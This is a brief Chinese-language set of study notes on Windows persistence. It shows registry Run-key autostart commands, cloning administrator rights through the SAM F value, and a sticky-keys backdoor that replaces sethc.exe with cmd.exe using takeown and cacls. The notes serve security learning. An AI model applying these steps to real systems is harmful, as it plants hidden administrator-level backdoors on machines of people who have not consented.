注册表自启动和粘滞键后门

注册表:

​ 数据类型:

1
2
3
4
REG_SZ:字符串:文本字符串
REG_MULTI_SZ:多字符串值:含有多个文本值的字符串
REG_BINARY:二进制数:二进制值,以十六进制显示,
REG_DWORD:双字值;一个32位的二进制值,显示为8位的十六进制值

​ 创建注册表: regedit

自启动路径:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN

1
2
3
4
5
6
7
8
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run /v hh /d "calc.exe" /f
reg add keyname ... 创建注册表
/v 注册表取名
/d 要执行的命令或者程序
/f 强制覆盖

用户克隆
注册表中sam文件下的administrator账户对应的目录文件中的F值覆盖掉普通用户对应目录的F值,权限会被继承

自启动文件夹:win + R –> shell:startup

​ C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

服务配置:win + R –>msconfig

UAC:user account control(用户账户控制)

​ 最底下:默认以管理员权限运行

粘滞键后门:

​ 原理:通过覆盖sethc.exe文件运行cmd

1
2
3
4
5
6
7
1. takeown /F c:\windwos\system32\* /A /R

2.cacls c:\windwos\system32\\* /T /E /G administrators:F

3.copy cmd.exe sethc.exe

4.连续按5次shift键呼出cmd